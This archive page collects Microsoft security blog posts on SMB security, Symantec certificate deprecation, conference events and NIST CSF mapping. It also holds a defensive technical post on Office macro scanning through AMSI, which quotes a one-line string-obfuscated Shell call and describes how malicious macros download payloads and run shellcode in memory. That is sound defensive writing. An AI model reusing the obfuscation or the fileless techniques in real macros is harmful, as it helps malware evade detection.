Author Archive

Take steps to secure your business and users with our security business assessment

Businesses can no longer afford to take cybersecurity for granted. You cant read the news without seeing a splashy headline about a successful hack or data breach at a well-known company. However, this isnt just a problem for large enterprisesincreasingly small and medium-sized businesses are becoming targets of cybercriminals and need to take steps to improve their security.

Yet it can be hard for small and medium-sized businesses to right size a security strategy for their unique business. We believe a good place to start is by answering these four questions:

  • How secure are your users and accounts?
  • How protected are you from threats?
  • How safe is your data?
  • How effectively are you managing security?

The Microsoft Security Assessment can help you discover where you are vulnerable and provide personalized recommendations to improve your security posture. Keep reading for a peek at some of our key learnings from the assessment.

How secure are your users and accounts?

In todays modern workplace, employees work from anywhere on any number of devices. This has been great for personal productivity, but has also created more possible points of entry for hackers to break in. One of the biggest challenges is to make it easy for your users to connect to the resources they need, from the devices they prefer, while balancing security for your company and its assets.

There are many ways to protect your accounts, but make sure you include Multi-Factor Authentication (MFA), as no password is foolproof. MFA is safer because it requires two forms of authentication to gain access. For example, you can require that users sign in with a password plus either a code generated by an application or a biometric, like fingerprints or facial recognition. Products such as Microsoft 365 Business make it easy to enable MFA for your email, file storage, and productivity apps, adding another layer of defense to your organization’s assets.

How protected are you from threats?

The latest figures show that cybercriminals are increasingly targeting small and medium-sized business alongside big businesses. Forty-one percent of businesses with fewer than 250 employees reported an attack in the last 12 months. Fortunately, there are practical things you can do to reduce your vulnerability, and every step makes a huge difference.

Two recommendations that are low cost, or even free, include maintaining software upgrade cycles and conducting regular employee training. If you dont require that employees keep software updated and patched, consider starting. Whether it is for the operating system, servers, devices, applications, plug-ins, or any other technology, updates will reduce security vulnerabilities. You can also increase your security posture through regular employee security training. The onboarding process is a good opportunity to share cybersecurity practices, but dont stop there. Consider putting a regular security training program in place to remind employees how to detect and report suspicious links, attachments, and emails; avoid malicious websites; and download only verified applications.

How safe is your data?

One of your most valuable assets is your data. Data includes everything from a private document, to personal identifiable information, to sales projections, and more. In all cases, it will be damaging to individuals and your business if it gets into the wrong hands. You need to protect sensitive data where it lives and while it travels.

One way to safeguard critical documents is with encrypted access. Document-level protection helps guarantee that only authorized users can read and inspect privileged data, even when it is sent outside of your organization. This level of protection is available in certain products, such as Microsoft 365 Business, which also includes the ability to notify and educate users when they are working with sensitive data.

How effectively are you managing security?

A strong defense is more than just a set of tools and practices. You need a thoughtful approach to how you manage security. Effective security management will give you visibility into vulnerabilities across all your resources, and it will encourage consistency across your security policies. With a strategic approach you will better understand your current risks and be able to identify opportunities to increase your protection.

A critical component of security management is periodic reviews of user access to data, devices, and networks. People, roles, and responsibilities change over time, which is why its good to know what roles have access to what resources.You can use this review to make sure that users have the right level of access, for the right time period, based on their role. For example, someone in HR might need to access the financial services database during a specific project. You can also make sure those that have left your organization or changed role have been de-provisioned, and you can investigate any suspicious activity that is detected.

Evaluate how well your businesses is protected

Unfortunately, it is not just the big brands that must combat cyberattacks. Small and medium-sized businesses are also at risk. Weve given you a sampling of our recommended security best practices, but there is still more you may want to consider. The security assessment can help you evaluate holistically how strong your current defenses are and provide specific actionable recommendations that you can put in place to increase your confidence and reduce your vulnerabilities.

Take the Microsoft Security Assessment and bookmark the Microsoft Secure blog to read up on the latest steps or deployment tips to keep your business safer.


1SMB ITDM Omnibus Survey

The post Take steps to secure your business and users with our security business assessment appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Microsoft partners with DigiCert to begin deprecating Symantec TLS certificates

Starting in September 2018, Microsoft began deprecating the SSL/TLS capability of Symantec root certificates due to compliance issues. Google, Mozilla, and Apple have also announced deprecation plans related to Symantec SSL/TLS certificates. Symantec cryptographic certificates are used in critical environments across multiple industries. In 2017, DigiCert acquired Symantecs web security business that included their certificate authority business.

Since the compliance issues were identified, Microsoft has been engaged with Symantec and DigiCert to uphold industry-wide compliance expectations and maintain customer trust. DigiCert created the deprecation schedule below in partnership with Microsoft to maintain trust in the industry while minimizing impact to our mutual customers.

During certificate renewal, customers must now replace their current certificate with one signed by a non-Symantec root. Based on the schedule below, Microsoft Edge and Internet Explorer running on Windows 10/Windows Server 2016 will no longer trust certificates signed by the associated root certificate if issued after the TLS NotBefore Date. Any certificates issued prior to this date will continue to be trusted until the certificates natural expiration. Internet Explorer running on legacy Windows versions will not be impacted.

Customers with questions about their certificates or this deprecation schedule are encouraged to contact DigiCert by visiting SSL Certificate Support.

Name Thumbprint Planned TLS NotBefore Date
Symantec Class 3 Public Primary Certification Authority-G6 26A16C235A2472229B23628025BC8097C88524A1 9/30/2018
thawte Primary Root CA-G2 AADBBC22238FC401A127BB38DDF41DDB089EF012 9/30/2018
GeoTrust Universal CA E621F3354379059A4B68309D8A2F74221587EC79 9/30/2018
Symantec Class 3 Public Primary Certification Authority-G4 58D52DB93301A4FD291A8C9645A08FEE7F529282 1/31/2019
VeriSign Class 3 Public Primary Certification Authority-G4 22D5D8DF8F0231D18DF79DB7CF8A2D64C93F6C3A 1/31/2019
GeoTrust Primary Certification Authority-G2 8D1784D537F3037DEC70FE578B519A99E610D7B0 4/30/2019
VeriSign Universal Root Certification Authority 3679CA35668772304D30A5FB873B0FA77BB70D54 4/30/2019
thawte Primary Root CA-G3 F18B538D1BE903B6A6F056435B171589CAF36BF2 4/30/2019
GeoTrust Primary Certification Authority-G3 039EEDB80BE7A03C6953893B20D2D9323A4C2AFD 4/30/2019
GeoTrust 323C118E1BF7B8B65254E2E2100DD6029037F096 4/30/2019
thawte 91C6D6EE3E8AC86384E548C299295C756C817B81 4/30/2019
VeriSign 4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5 4/30/2019
GeoTrust Global CA DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212 4/30/2019
VeriSign 132D0D45534B6997CDB2D5C339E25576609B5CC6 4/30/2019


The post Microsoft partners with DigiCert to begin deprecating Symantec TLS certificates appeared first on Microsoft Secure.

Categories: Data Privacy Tags:

Ignite 2018 highlights: passwordless sign-in, confidential computing, new threat protection, and more

What a week it was in Orlando! Ignite is always a biggie, and this one was no exception. For all of us here at Microsoft who get to work on security, spending time with customers to learn how you are using our security products today and to share new innovations to come is a highlight. At this year’s event we put even greater emphasis on providing attendees with access to engineering experts throughout more than one hundred focused sessions, workshops, and hands-on immersion experiences for the latest technologies in security. I was chuffed to see that our security booths at the center of the expo hall were chock-a-block for the whole event. Thank you to everyone who stopped by, attended our social and community events, and connected with our engineers and product managers.

After their security blanket work at the RSA Conference earlier this year, our social team once again took a shot at peak swag. Our Security SOCs were the result, lovingly designed and then crafted from the finest combed cotton, bringing fashion together with a six-month Enterprise Mobility + Security trialquite the combination.

Show us your own fashion moment through social media with #askmeaboutmySOC #showmeyourSOC.

More seriously, if you weren’t able to join us this year, or found yourself trading off between sessions or workshops at the show, don’t worry, our breakout sessions on security are available on-demand. At Ignite 2018, we also brought a deep lineup of new security innovations that I have summarized below, along with some top session recommendations:

Identity and access management

We really dont like passwords, so together we want to help you eliminate their use through simpler, more secure alternatives. New support for passwordless sign-in to Azure Active Directory (Azure AD) connected appsboth cloud and on-premisesthrough the Microsoft Authenticator app can help you replace passwords with a more secure, multi-factor sign-in that can reduce compromise by 99.9 percent and significantly simplify the user experience. Watch the Ignite session: Getting to a world without passwords.

We also announced two powerful new features in our set of identity governance capabilities for Azure AD to help automate the process of granting access to employees and partners: Entitlement Management and My Access. Watch the Ignite session: Govern access to your resources with Azure AD identity governance. And read more about identity and access management announcements.

Information protection

As you move more of your workloads to the cloud, meeting information security and compliance standards needs a new approach. Azure is the first cloud platform to offer confidentiality and integrity of data while in useadding to the protections already in place that help keep your data secure in transit and at rest. Azure confidential computing benefits are available soon on a new DC series of virtual machines in Azure, enabling trusted execution environments using Intel SGX chipsets to protect data while its being computed. Watch the Ignite session: Protection by design: Intel SGX and Azure Confidential Computing.

Weve also rolled out a new unified labeling experience in the Security & Compliance Center in Microsoft 365 that delivers a single, integrated approach to creating data sensitivity and data retention labels. You can preview new labeling capabilities that are built into Office apps across all major platforms and new extensions of labeling and protection capabilities to include PDFs. The Microsoft Information Protection SDK, now generally available, enables other software creators to enhance and build applications that understand, apply, and act on Microsoft sensitivity labels so you can have more cohesive information protection. Read more about the information protection announcements and watch the Ignite session.

Threat protection

Microsoft Threat Protection, announced at Ignite last week, is an integrated experience for detection, investigation, and remediation across endpoints, email, documents, identity, and infrastructure. This new integration in the Microsoft 365 admin console combines signal across all of Office 365 Advanced Threat Protection (ATP), Windows Defender ATP, Microsoft Cloud App Security, Azure AD Identity Protection, and the Azure Security Center to help you secure across your digital estate. The portal not only provides alerts and monitoring of threats, but also gives you the ability to make real-time policy changes to help your security strategy stay ahead of changing threats. Read more about Microsoft Threat Protection or watch the Ignite session.

Microsoft Cloud App Security can now leverage the traffic information collected by Windows Defender Advanced Threat Protection about the cloud apps and services being accessed from IT-managed Windows 10. This native integration provides admins a more complete view of cloud usage in their organization and easier investigative work. Read more about this integration or watch the Ignite session.

Security management

To help you strengthen your security posture, youll want to understand your current position and where to go from there. Microsoft Secure Score is the only dynamic report card for cybersecurity. Organizations that use the Secure Score assessments and recommendations typically reduce their chance of a breach by 30-fold. Microsoft Secure Score provides guidance to improve your security posture. For example, Secure Score can recommend taking steps to secure your admin accounts with Multi-Factor Authentication (MFA), secure users accounts with MFA, and turn off client-side email forwarding rules. Starting today, were expanding Secure Score to cover all of Microsoft 365. We are also introducing Secure Score for hybrid cloud workloads in the Azure Security Center, so you can have full visibility across your organizations entire estate. Read more about Microsoft Secure Score or watch the Ignite session.

Unified endpoint management

Customers using System Center Configuration Manager and Microsoft Intune to manage their existing infrastructure benefit immediately from the scale, reliability, and security of the cloud. We announced new capabilities for unified endpoint management (UEM) at Ignite to empower IT to secure your data across a variety of devices and platforms, and to help you deliver intuitive and native user experiences for Windows 10, iOS, and Android devices. Read more about all the UEM advancements or watch the Ignite session.

Looking ahead

Working closely with customers is at the center of our ability to innovate and evolve our security technologies. Ignite is a top-notch opportunity to build security community. It doesnt stop there though. We are always interested in your feedback as we roll out new capabilitiesdo join us and have your voice heard via the Tech Community.

The post Ignite 2018 highlights: passwordless sign-in, confidential computing, new threat protection, and more appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Get deeper into security at Microsoft Ignite 2018

This year at Microsoft Ignite, we will be making some exciting announcementsfrom new capabilities for identity management and information protection to powerful artificial intelligence (AI) innovations that can help you stay ahead of an often overwhelming surge in threats and security alerts.

Join us as we share best practices for current products, reveal highlights of our new offerings, and give you a glimpse of our future product vision.

Start by attending Satya Nadellas keynote. Then kickstart your security journey with this session: Microsoft Security: How the cloud helps us all be more secure featuring Rob Lefferts (GS008). Well highlight whats new in Microsoft security and how our customers and partners are using the Microsoft Cloud to accelerate security and productivity. Watch our demo showcase to see for yourself how unique intelligence and new innovations from Microsoft can help you be more secure across your entire digital estate.

Here are just a few of the other sessions at Ignite that will showcase our security technology and the innovation we have invested in throughout 2018 and into 2019. Add them to your Session Scheduler and check out the Session Catalog for the full list. If you cant attend in person, you can watch the live stream starting on September 24 with on-demand sessions to follow.

  • Leveraging the power of Microsoft threat protection (BRK4000). Learn about the services that make up Microsoft threat protection and how they work together across data, endpoints, identities, and infrastructure.
  • Double your security team productivitywithout doubling capacity (BRK2251). Learn how automated threat protection and remediation works seamlessly out of the box, using AI to respond to alerts and help security teams solve capacity and skill-gap challenges.
  • How to build security applications using the Microsoft Graph Security API (WRK3006). The Microsoft Graph has been extended with a new Security Graph API. Join this lab to get started using the Security API, including creating and authenticating a new app and using sample code to query the API.
  • Azure Active Directory: New features and roadmap (BRK2254). Come to this can’t-miss session for anyone working with or considering their strategy for identity and access management in the cloud. Hear about the newest features and experiences across identity protection, conditional access, single sign-on, hybrid identity environments, managing partner and customer access, and more.
  • Using Microsoft Secure Score to harden your security position (BRK3247). In this session, we help you understand what your current security position is in products like Office 365 and Windows and show you how you can easily increase your position though the built-in recommendations.
  • Getting to a world without passwords (BRK3031). Get the latest info and demos on what’s new with FIDO2, WebAuthN, Azure Active Directory, Windows Hello, and Microsoft Authenticator to help you make passwords a relic of the past.
  • Accelerate deployment and adoption of Azure Information Protection (BRK3009). Learn all about best practices in deploying Azure Information Protection to help protect your sensitive datawherever it lives or travels.
  • Registering and managing apps through Microsoft Azure Portal and Microsoft Graph API (THR2079). Come learn how to register apps to sign in Azure AD and personal Microsoft accounts, manage these apps, and get access to APIs all through Azure Portal, Microsoft Graph API, and PowerShell.
  • Secure enterprise productivity with Office 365 threat protection services (BRK4001). Learn about the latest advanced in services such as Exchange Online Protection (EOP), Advanced Threat Protection (ATP), and Threat Intelligenceand get a detailed roadmap of whats to come.
  • Simplify your IT management and level up with Microsoft 365 (GS004). Come and learn how Microsoft 365 will help you simplify your modern workplace, delight and empower your users, and protect and secure your corporate assets.
  • Managing devices with Microsoft Intunewhats new (BRK3036). Learn how Intune raises the bar once again for Android, Apple, and Windows device management, and hear more about the exciting new features and new use-cases announced at Ignite.
  • Elevate the security for all your cloud apps and services with the Microsoft Cloud App Security (CASB) solution (BRK2158). Gain visibility into your cloud apps and services with sophisticated analytics to identify and combat cyberthreats, and control how your ubiquitous data travels.

And one other exciting note: To see our solutions in action and gain access to a 6-month free trial of our EMS E5 solution, be sure to stop by the Microsoft Showcase for in-depth product demos and discussions with security experts.

For more Ignite news and updates, check back to our Secure Blog as we continue to highlight specific sessions and topics throughout the week.

The post Get deeper into security at Microsoft Ignite 2018 appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Office VBA + AMSI: Parting the veil on malicious macros

As part of our continued efforts to tackle entire classes of threats, Office 365 client applications now integrate with Antimalware Scan Interface (AMSI), enabling antivirus and other security solutions to scan macros and other scripts at runtime to check for malicious behavior.

Macro-based threats have always been a prevalent entry point for malware, but we have observed a resurgence in recent years. Continuous improvements in platform and application security have led to the decline of software exploits, and attackers have found a viable alternative infection vector in social engineering attacks that abuse functionalities like VBA macros. Microsoft, along with the rest of the industry, observed attackers transition from exploits to using malicious macros to infect endpoints. Malicious macros have since showed up in commodity malware campaigns, targeted attacks, and in red-team activities.
Figure 1. Prevalence of the exploit vs macro attack vector observed via Windows Defender ATP telemetry

To counter this threat, we invested in building better detection mechanisms that expose macro behavior through runtime instrumentation within our threat protection solutions in the cloud. Were bringing this instrumentation directly into Office 365 client applications. More importantly, were exposing this capability through AMSI, an open interface, making it accessible to any antivirus solution.

Obfuscation and other forms of detection evasion

Macros are popular among attackers because of the rich capabilities that the VBA runtime exposes and the privileged context in which macros execute. Notably, as with all scripting languages, attackers have another advantage: they can hide malicious code through obfuscation.

To evade detection, malware needs to hide intent. The most common way that attackers do this is through code obfuscation. Macro source codes are easy to obfuscate, and a plethora of free tools are available for attackers to automatically do this. This results in polymorphic malware, with evolving obfuscation patterns and multiple obfuscated variants of the same malicious macro.

Theres more: malicious code can be taken out of the macro source and hidden in other document components like text labels, forms, Excel cells, and others. Or why hide at all? A small piece of malicious code can be embedded somewhere in a huge legitimate source and keep a low profile.

How can antivirus and other security solutions cope? Today, antivirus solutions can extract and scan the obfuscated macro source code from an Office document. How can the macros intent be exposed? What if security solutions can observe a macros behavior at runtime and gain visibility into system interactions? Enter Office and AMSI integration.

AMSI on Windows 10

If AMSI rings a bell, its because we talked about how PowerShell adopted AMSI in a blog post when AMSI was introduced back in 2015.

Antimalware Scan Interface (AMSI) is an open interface available on Windows 10 for applications to request, at runtime, a synchronous scan of a memory buffer by an installed antivirus or security solution. Any application can interface with AMSI and request a scan for any data that may be untrusted or suspicious.

Any antivirus can become an AMSI provider and inspect data sent by applications via the AMSI interface. If the content submitted for scan is detected as malicious, the requesting application can take action to deal with the threat and ensure the safety of the device. To learn more, refer to the AMSI documentation.

AMSI also integrates with the JavaScript, VBScript, and PowerShell scripting engines. Over the years, we have been steadily increasing our investments in providing security solutions with deeper visibility into script-based threats. Insights seen via AMSI is consumed by our own security products. The new Office and AMSI integration is yet another addition to the arsenal of protection against script-based malware. Windows Defender Advanced Threat Protection (Windows Defender ATP) leverages AMSI and machine learning to combat script-based threats that live off the land (read our previous blog post to learn more).

Office VBA integration with AMSI

The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection.

Figure 2. Runtime scanning of macros via AMSI

Logging macro behavior

The VBA language offers macros a rich set of functions that can be used to interface with the operating system to run commands, access the file system, etc. Additionally, it allows the ability to issue direct calls to COM methods and Win32 APIs. The VBA scripting engine handles calls from macro code to COM and APIs via internal interfaces that implement the transition between the caller and the callee. These interfaces are instrumented such that the behavior of a macro is trapped and all relevant information, including the function name and its parameters, are logged in a circular buffer.

This monitoring is not tied to specific functions; its generic and works on any COM method or Win32 API. The logged calls can come in two formats:

  • <COM_Object>.<COM_Method>(Parameter 1, , Parameter n);
  • <API_or_function_Name>(Parameter 1, , Parameter n);

Invoked functions, methods, and APIs need to receive the parameters in the clear (plaintext) in order to work; thus, this behavioral instrumentation is not affected by obfuscation. This instrumentation thus reveals a weak spot for macro codes; the antivirus now has visibility on relevant activity of the macro in the clear.

To illustrate, consider the following string obfuscation in a shell command:

Shell(ma+l+ wa+ r + e.e + xe)

With the Office VBA and AMSI integration, this is logged like so:


Triggering on suspicious behavior

When a potentially high-risk function or method (a trigger; for example, CreateProcess or ShellExecute) is invoked, Office halts the execution of the macro and requests a scan of the macro behavior logged up to that moment, via the AMSI interface. The AMSI provider (e.g., antivirus software) is invoked synchronously and returns a verdict indicating whether or not the observed behavior is malicious.

The list of high-risk functions or triggers are meant to cover actions at various stages of an attack chain (e.g., payload download, persistence, execution, etc.) and are selected based on their prevalence among malicious and benign macros. The behavior log sent over AMSI can include information like suspicious URLs from which malicious data was downloaded, suspicious file names known to be associated with malware, and others. This data is valuable in determining if the macro is malicious, as well as in the creation of detection indicators all without any influence from obfuscation.

Stopping malicious macros upon detection

If behavior is assessed malicious, macro execution is stopped. The user is notified by the Office application, and the application session is shut down to avoid any further damage. This can stop an attack in its tracks, protecting the device and user.

Figure 3. Malicious macro notification

Case study 1: Heavily obfuscated macro code

(SHA-256: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd)

To illustrate how the Office VBA and AMSI integration can expose malicious macro code, lets look at a recent social engineering attack that uses macro-based malware. The initial vector is a Word document with instructions in the Chinese language to Enable content.

Figure 4: The malicious document instructs to enable the content

If the recipient falls for the lure and enables content, the malicious macro code runs and launches a command to download the payload from a command-and-control server controlled by the attacker. The payload, an installer file, is then run.

The macro code is heavily obfuscated:

Figure 5: Obfuscated macro

However, behavior monitoring is not hindered by obfuscation. It produces the following log, which it passes to AMSI for scanning by antivirus:

Figure 6: De-obfuscated behavior log

The action carried out by the macro code is logged, clearly exposing malicious actions that antivirus solutions can detect much more easily than if the code was obfuscated.

Case study 2: Macro threat that lives off the land

(SHA-256: 7952a9da1001be95eb63bc39647bacc66ab7029d8ee0b71ede62ac44973abf79)

The following is an example of macro malware that lives off the land, which means that it stays away from the disk and uses common tools to run code directly in memory. In this case, it uses shellcode and dynamic pages. Like the previous example, this attack uses social engineering to get users to click Enable Content and run the macro code, but this one uses instructions in the Spanish language in Excel.

Figure 7. Malicious Excel file with instructions to enable content

When run, the macro code dynamically allocates virtual memory, writes shellcode to the allocated location, and uses a system callback to transfer execution control. The malicious shellcode then achieves fileless persistence, being memory-resident without a file.

Figure 8. Macro code utilizing Win32 APIs to launch embedded shellcode

When the shellcode gets execution control, it launches a PowerShell command to download additional payload from a command-and-control server controlled by the attacker.

Figure 9. PowerShell command that downloads payload

Even if the macro code uses fileless code execution technique using shellcode, its behavior is exposed to antivirus solutions via the AMSI interface. Sample log is shown below:

Figure 10. De-obfuscated behavior log

With the AMSI scan integration in both Office VBA and PowerShell, security solutions like Windows Defender ATP can gain clear visibility into malicious behavior at multiple levels and successfully block attacks.

Windows Defender ATP: Force multiplier and protection for down-level platforms

In addition to protecting users running Office 365 applications on Windows 10, detections via AMSI allow modern endpoint protection platforms like Windows Defender ATP to extend protection to customers via the cloud.

Figure 11. Simplified diagram showing how AMSI detections in a few machines are extended to other customers via the cloud

In Windows Defender AVs cloud-delivered antivirus protection, the Office VBA and AMSI integration enriches the signals sent to the cloud, where multiple layers of machine learning models classify and make verdicts on files. When devices encounter documents with suspicious macro code, Windows Defender AV sends metadata and other machine learning features, coupled with signals from Office AMSI, to the cloud. Verdicts by machine learning translate to real-time protection for the rest of Windows Defender AV customers with cloud protection enabled.

This protection is also delivered to the rest of Microsoft 365 customers. Through the Microsoft Intelligent Security Graph, security signals are shared across components of Microsoft 365 threat protection. For example, in the case of macro malware, detections of malicious macro-laced documents by Windows Defender AV are shared with Office 365 ATP, which blocks emails carrying the document, stopping attacks before the documents land in users mailboxes.

Figure 12. The Office and AMSI integration enriches the orchestration of protection across Microsoft 365

Within a few weeks after the release of this new instrumentation in Office VBA and the adoption by Windows Defender ATP, we saw this multiplier effect, with signals from a few hundred devices protecting several tens of thousands of devices. Because Office AMSI feature exposes behaviors of the macro irrespective of content, language, or obfuscation, signals from one part of the world can translate to protection for the rest of the globe this is powerful.


AMSI integration is now available and turned on by default on the Monthly Channel for all Office 365 client applications that have the ability to run VBA macros including Word, Excel, PowerPoint, and Outlook.

In its default configuration, macros are scanned at runtime via AMSI except in the following scenarios:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from trusted locations
  • Documents that are trusted documents
  • Documents that contain VBA that is digitally signed by a trusted publisher

Office 365 applications also expose a new policy control for administrators to configure if and when macros are scanned at runtime via AMSI:

Group Policy setting name Macro Runtime Scan Scope
Path User Configuration > Administrative templates > Microsoft Office 2016 > Security Settings

This policy setting specifies for which documents the VBA Runtime Scan feature is enabled.

Disable for all documents: If the feature is disabled for all documents, no runtime scanning of enabled macros will be performed.

Enable for low trust documents: If the feature is enabled for low trust documents, the feature will be enabled for all documents for which macros are enabled except:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from a Trusted Location
  • Documents that are Trusted Documents
  • Documents that contain VBA that is digitally signed by a Trusted Publisher

Enable for all documents: If the feature is enabled for all documents, then the above class of documents are not excluded from the behavior.

This protocol allows the VBA runtime to report to the Anti-Virus system certain high-risk code behaviors it is about to execute and allows the Anti-Virus to report back to the process if the sequence of observed behaviors indicates likely malicious activity so the Office application can take appropriate action.

When this feature is enabled, affected VBA projects’ runtime performance may be reduced.

Conclusion: Exposing hidden malicious intent

Macro-based malware continuously evolves and poses challenges in detection using techniques like sandbox evasion and code obfuscation. Antimalware Scan Interface (AMSI)s integration with Office 365 applications enable runtime scanning of macros, exposing malicious intent even with heavy obfuscation. This latest improvement to Office 365 allows modern endpoint security platforms like Windows Defender ATP to defeat macro-based threats.

Code instrumentation and runtime monitoring are powerful tools for threat protection. Combined with runtime scanning via AMSI, they enable antivirus and other security solutions to have greater visibility into the runtime behavior of a macro execution session at a very granular level, while also bypassing code obfuscation. This enables antivirus solutions to (1) detect a wide range of mutated or obfuscated malware that exhibit the same behavior using a smaller but more efficient set of detection algorithms, and (2) impose more granular restrictions on what macros are allowed to do at runtime.

Moreover, AMSI protection is not limited to macros. Other scripting engines like JavaScript, VBScript, and PowerShell also implement a form of code instrumentation and interface with AMSI. Attacks with multiple stages that use different scripts will be under scrutiny by AMSI at each step, exposing all behaviors and enabling detection by antivirus and other solutions.

We believe this is another step forward in elevating security for Microsoft 365 customers. More importantly, AMSI and Office 365 integration enables the broader ecosystem of security solutions to better detect and protect customers from malicious attacks without disrupting day-to-day productivity.



Giulia Biagini, Microsoft Threat Intelligence Center
Sriram Iyer, Office Security
Karthik Selvaraj, Windows Defender ATP Research





The post Office VBA + AMSI: Parting the veil on malicious macros appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Attending Black Hat USA 2018? Here’s what to expect from Microsoft.

Black Hat USA 2018 brings together professionals at all career levels, encouraging growth and collaboration among academia, world-class researchers, and leaders in the public and private sectors. This is an exciting time as our Microsoft researchers, partners, and security experts will showcase the latest collaborations in defense strategies for cybersecurity, highlight solutions for security vulnerabilities in applications, and bring together an ecosystem of intelligent security solutions. Our objective is to arm business, government, and consumers with deeply integrated intelligence and threat protection capabilities across platforms and products.

Security researchers play an essential role in Microsofts security strategy and are key to community-based defense. To show our appreciation for their hard work and partnership, each year at Black Hat USA, the Microsoft Security Response Center (MSRC) highlights the contributions of these researchers through the list of Top 100 security researchers reporting to Microsoft (either directly or through a third party) during the previous 12 months. While one criterion for the ranking is volume of fixed reports a researcher has made, the severity and impact of the reports is very important to the ranking also. Given the number of individuals reporting to Microsoft, anyone ranked among the Top 100 is among some of the top talent in the industry.

In addition to unveiling the Top 100 and showcasing Microsoft security solutions at Booth #652, there are a number of featured Microsoft speakers and sessions:

Join us at these sessions during the week of August 4-9, 2018 in Las Vegas and continue the discussion with us in Booth #652, where we will have product demonstrations, theatre presentations, and an opportunity to learn more about our Top 100 and meet with some of Microsofts security experts and partners.

Categories: cybersecurity Tags:

Microsoft Intelligent Security Association expands with new members and products

Last April, we introduced theMicrosoft Intelligent Security Associationa group of 19 security technology providers who have integrated their solutions with a select set of Microsoft products to provide customers better protection, detection, and response.

Today, we are pleased to announce five new members have agreed to join the associationDuo Security, Fortinet, Trusona, Yubico, and Contrast Security. Microsoft is committed to growing the association with partners who can help increase the digital safety to our mutual customers.

In addition to these new members, we are also announcing the addition of Microsoft Cloud App Securityexpanding the products included in the program. Cloud App Security gives you visibility into your cloud apps and services, provides sophisticated analytics to identify and combat cyberthreats, and enables you to control how your data travels.We are thrilled that existing members Zscaler and Forcepoint have integrated with our Cloud App Security product to increase the capabilities in new and exciting ways.

Microsoft is excited by the initial reaction to the Microsoft Intelligent Security Association, and we are committed to continuing to build on this early momentum.

Categories: Uncategorized Tags:

Assessing Microsoft 365 security solutions using the NIST Cybersecurity Framework

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blogNew FastTrack benefit: Deployment support for Co-management on Windows 10 devices.

Microsoft 365 security solutions align to many cybersecurity protection standards. One widely-adopted standard is the National Institute of Standards and Technology Cybersecurity Framework (NIST CSF). Developed for the US government, NIST CSF is now also used by governments and enterprises worldwide as a best practice for managing cybersecurity risk. Mapping your Microsoft 365 security solutions to NIST CSF can also help you achieve compliance with many certifications and regulations, such as FedRAMP, and others.

Microsoft 365 security solutions are designed to help you empower your users to do their best work securely, from anywhere and with the tools they love. Our security philosophy is built on four pillars: identity and access management, threat protection, information protection, and security management. Microsoft 365 E5 (see Figure 1.) includes products for each pillar that work together to keep your organization safe.

Figure 1.The Microsoft 365 security solutions

At the heart of NIST CSF is the Cybersecurity Framework Core a set of Functions and related outcomes for improving cybersecurity (see Figure 2). In this blog, well show you examples of how you can assess Microsoft 365 security capabilities using the four Function areas in the core: Identify, Protect, Detect and Respond.* Well also provide practical tips on how you can use Microsoft 365 Security to help achieve key outcomes within each function.

Figure 2.The NIST Cybersecurity Framework Core


Develop the organizational understanding to manage cybersecurity risk to systems, assets, data, and capabilities.

The purpose of this function is to gain a better understanding of your IT environment and identify exactly which assets are at risk of attack. From there, you can start to align these assets and associated risks to your overall business goals (including regulatory and industry requirements) and prioritize which assets require attention.

For example, the Asset management category is about identifying and managing the data, personnel, devices, and systems that enable an organization to achieve its business purpose in a way that is consistent with their relative importance to business objectives and the organizations risk strategy.

Microsoft 365 security solutions help identify and manage key assets such as user identity, company data, PCs and mobile devices, and cloud apps used by company employees. First, provisioning user identities in Microsoft Azure Active Directory (AD) provides fundamental asset and user identity management that includes application access, single sign-on, and device management. Through Azure AD Connect, you can integrate your on-premises directories with Azure Active Directory. (See Figure 3.) This capability allows for a common secure identity for users of Microsoft Office 365, Azure, and thousands of other Software as a Service (SaaS) applications pre-integrated into Azure AD.

Figure 3.Through Azure AD Connect, you can integrate your on-premises directories with Azure Active Directory

Deployment Tip:Start by managing identities in the cloud with Azure AD to get the benefit of single sign-on for all your employees. Azure AD Connect will help you integrate your on-premises directories with Azure Active Directory.


Develop and implement the appropriate safeguards to ensure delivery of critical infrastructure services.

The Protect function focuses on policies and procedures to protect data from a potential cybersecurity attack.

Microsoft 365 security solutions support NIST CSF related categories in this function. For example, the Identity management and access control category is about managing access to assets by limiting authorization to devices, activities, and transactions. Your first safeguard against threats or attackers is to maintain strict, reliable, and appropriate access control. Azure Active Directory Conditional Access evaluates a set of configurable conditions, including user, device, application, and risk (see Figure 4.) Based on these conditions, you can then set the right level of access control. For access control on your networks.

Figure 4. Azure AD Conditional Access evaluates a set of configurable conditions, including user, device, application, and risk

Deployment Tip:Manage access control by configuring conditional access policies in Azure AD. Use conditional access to apply conditions that grant access depending on a range of factors or conditions, such as location, device compliance, and employee need.


Develop and implement the appropriate activities to identify the occurrence of a cybersecurity event.

The Detect function covers systems and procedures that help you monitor your environment and detect a security breach as quickly as possible.

Microsoft 365 security solutions provide you with solutions that detect and protect against Anomalies and events in real time. Microsoft 365 security solutions offer advanced threat protection (see Figure 5.), security and audit log management, and application whitelisting to ensure the security and resilience of systems and assets, consistent with related policies, procedures, and agreements. Microsoft 365 has capabilities to detect attacks across these three key attack vectors:

  • Device-based attacksWindows Defender Advanced Threat Protection provides near-instant detection and blocking of new and emerging threats using advanced file and process behavior monitoring and other heuristics. The Alerts queue shows a list of alerts that are flagged from machines in your network.
  • Email-based attacksOffice 365 Advanced Threat Protection protects your emails, attachments, online storage, files, and environment through a variety of technology, including Safe Attachments, Exchange Online Protection, and rich reporting and tracking insights
  • Identity credential attacksAzure Advanced Threat Protection Azure ATP takes information from logs and network events to learn the behavior of users in the organization and build a behavioral profile about them. Then it detects suspicious activities, searching for malicious attacks, abnormal behavior, and security issues and risks.

Figure 5.Threat detection integrated across Microsoft 365


Response processes and procedures are executed and maintained to ensure timely response to detected cybersecurity events

